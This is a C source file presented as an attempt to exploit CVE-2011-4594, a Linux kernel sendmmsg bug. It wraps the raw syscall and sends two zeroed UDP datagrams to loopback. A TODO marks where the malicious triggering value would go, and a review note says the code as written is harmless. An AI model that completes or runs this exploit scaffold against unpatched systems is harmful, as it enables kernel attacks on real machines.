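/*
 * Socket Splickt
 * by zx2c4
 *
 * This is an attempt to exploit CVE-2011-4594.
 *
 * It was patched in bc909d9ddbf7778371e36a651d6e4194b1cc7d4c.
 *
 * NOTE(review): as written, both message headers carry a valid
 * destination (see the TODO in main), so the program only sends two
 * zero-filled UDP datagrams to loopback port 10000 through sendmmsg(2).
 * Kernels carrying the commit above are not affected by the bug this
 * file names.
 */

#define _GNU_SOURCE

/*
 * The original listing's #include targets were lost in extraction;
 * these are the headers the code below actually needs.
 */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/* sendmmsg(2) syscall numbers for the architectures this file supports. */
#ifndef __NR_sendmmsg
#if defined(__PPC__)
#define __NR_sendmmsg 349
#elif defined(__x86_64__)
#define __NR_sendmmsg 307
#elif defined(__i386__)
#define __NR_sendmmsg 345
#else
#error __NR_sendmmsg not defined
#endif
#endif

/*
 * Local copy of struct mmsghdr — presumably so the program builds
 * against libc headers that do not yet declare sendmmsg(2).
 */
struct reimp_mmsghdr {
	struct msghdr msg_hdr;
	unsigned int msg_len;
};

/*
 * Raw sendmmsg(2) wrapper.
 *
 * @fd     socket to send on
 * @mmsg   array of @vlen message headers
 * @vlen   number of entries in @mmsg
 * @flags  sendmsg-style flags passed through to the kernel
 * @return number of messages sent, or -1 with errno set
 */
static inline int reimp_sendmmsg(int fd, struct reimp_mmsghdr *mmsg,
				 unsigned int vlen, unsigned int flags)
{
	return syscall(__NR_sendmmsg, fd, mmsg, vlen, flags, NULL);
}

/*
 * Sends two 10-byte zeroed datagrams to 127.0.0.1:10000 in a single
 * sendmmsg(2) call and prints how many the kernel accepted.
 *
 * Exit status: EXIT_SUCCESS on success, EXIT_FAILURE if socket() or
 * sendmmsg() fails (the error is reported with perror()).
 */
int main(int argc, char *argv[])
{
	(void)argc;
	(void)argv;

	int fd = socket(AF_INET, SOCK_DGRAM, 0);
	if (fd < 0) {
		/* The original used fd unchecked; a -1 fd only yields EBADF later. */
		perror("socket");
		return EXIT_FAILURE;
	}

	char buf[10] = {0};
	struct iovec iovec[1] = {
		{ .iov_base = buf, .iov_len = sizeof buf },
	};
	struct sockaddr_in addr = {
		.sin_family = AF_INET,
		.sin_port = htons(10000),
		.sin_addr.s_addr = htonl(INADDR_LOOPBACK),
	};

	/* Both headers share the same iovec and the same destination. */
	struct reimp_mmsghdr datagram[2];
	memset(datagram, 0, sizeof datagram);
	for (size_t i = 0; i < sizeof datagram / sizeof datagram[0]; i++) {
		datagram[i].msg_hdr.msg_iov = iovec;
		datagram[i].msg_hdr.msg_iovlen = 1;
		/* TODO: Pass something naughty here. */
		datagram[i].msg_hdr.msg_name = &addr;
		datagram[i].msg_hdr.msg_namelen = sizeof addr;
	}

	int ret = reimp_sendmmsg(fd, datagram, 2, 0);
	if (ret < 0) {
		perror("reimp_sendmmsg");
		close(fd);
		return EXIT_FAILURE;
	}
	printf("Sent %d packets.\n", ret);

	close(fd);
	return EXIT_SUCCESS;
}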